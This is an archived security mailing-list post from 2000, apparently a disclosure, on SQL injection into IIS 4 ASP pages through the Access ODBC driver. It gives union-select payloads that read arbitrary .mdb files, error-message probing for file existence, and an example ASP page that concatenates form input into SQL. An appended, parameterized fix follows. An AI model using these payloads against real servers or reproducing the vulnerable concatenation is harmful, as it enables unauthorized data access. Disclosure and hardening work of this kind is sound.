More SQL hacking with IIS 4 through Access Driver

From: Jesús López de Aguileta (aguiletaat_private)
Date: Mon Feb 07 2000 - 01:45:30 PST


    System:
    
    WinNT Spanish SP5
    Data Access 2.1
    Option Pack 4
    
    The following SQL works in an ADODB connection inside ASP:
    
    select field1,field2 from table_DSN_DB where field1=21 union select
    address,path from
    \winnt\profiles\administrador\escritorio\report.mdb.scanner
    
    The first statement (to the left of 'union') is the valid query. A DSN
    exists and points to the DB containing the table "table_DSN_DB". But the
    second, appended query does not have any DSN pointing to it. For this example
    I have used a Retina scanner report located on the Administrator desktop.
    
    Obviously IUSR_Server must have ACL authorization to the file "report.mdb"
    for this to work.
    
    Now think of typical code like this:
    ---------------------
    set conect_to = Server.CreateObject("ADODB.Connection")
    conect_to.open "validDSN"
    
    SQLQuery = "select family,description from table where family=" & _
        request.form("family_of_item")
    
    set lot_of_registers=conect_to.execute (SQLQuery)
    
    do while not lot_of_registers.EOF
    
        response.write( lot_of_registers.fields("family"))
        response.write( lot_of_registers.fields("description"))
    
        lot_of_registers.movenext
    
    loop
    --------------------------
    
    It would be easy to tweak this query to access any database on the NT box. The
    standard error report from IIS allows you to tune your query.
    
    But there is more: you can check for installation of vulnerable
    programs/scripts.
    
    If the file exists:
    -------------------------------------------------------------------------
    > select family,description from table where family=21 union select * from
    \autoexec.bat.mdb
    
    Microsoft OLE DB Provider for ODBC Drivers error '80004005'
    
    [Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
    'C:\AUTOEXEC.BAT'.
    
    ------------------------------------------
    
    If the file does not exist:
    
    ---------------------------------------
    > select family,description from table where family=21 union select * from
    \other_autoexec.bat.mdb
    
    Microsoft OLE DB Provider for ODBC Drivers error '80004005'
    
    [Microsoft][ODBC Microsoft Access Driver] Could not find file
    'C:\other_autoexec.bat'.
    --------------------------------------------------
    
    Solution:
    
    - Check the ACLs on all your Access databases on the NT box.
    - Check ALL the input from any form that could be used to construct a SQL
    query.
    
    Regards,
    
    Jesús López de Aguileta
    EunateNet
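
A hardened form of the ASP lookup from the message, added here as an example and not part of the original post: it applies the "check ALL the input" advice by allow-listing the form value as digits, binds it as an integer parameter instead of concatenating it, and replaces the detailed driver error with a generic one. The DSN, table and field names are the message's own placeholders; the ADO constant values, the nine-digit limit and the response texts are assumptions of this sketch.

```vbscript
<%
' Added example (not from the original post): parameterized version of the lookup.
' ADO constants declared inline so no adovbs.inc include is needed.
Const adInteger = 3, adParamInput = 1, adCmdText = 1

Dim raw, re, familyId, conn, cmd, rs
raw = Trim(Request.Form("family_of_item"))

' Allow-list check: digits only, at most 9 so the value fits in a Long.
' A value such as "21 union select ..." is rejected before any SQL is built.
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(raw) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid item family."
    Response.End
End If
familyId = CLng(raw)

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "validDSN"

' The value travels as a typed parameter, never as part of the SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "select family,description from table where family=?"
cmd.Parameters.Append cmd.CreateParameter("family", adInteger, adParamInput, , familyId)

' Do not echo driver errors: messages like "Could not find file" act as an oracle.
On Error Resume Next
Set rs = cmd.Execute
If Err.Number <> 0 Then
    Err.Clear
    Response.Status = "500 Internal Server Error"
    Response.Write "The request could not be completed."
    Response.End
End If
On Error GoTo 0

Do While Not rs.EOF
    ' & "" turns Null fields into empty strings before encoding.
    Response.Write Server.HTMLEncode(rs.Fields("family") & "")
    Response.Write Server.HTMLEncode(rs.Fields("description") & "")
    rs.MoveNext
Loop
rs.Close : conn.Close
%>
```

Input handling does not replace the first item of the solution: the file ACLs still decide which .mdb files IUSR_Server can open.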
    


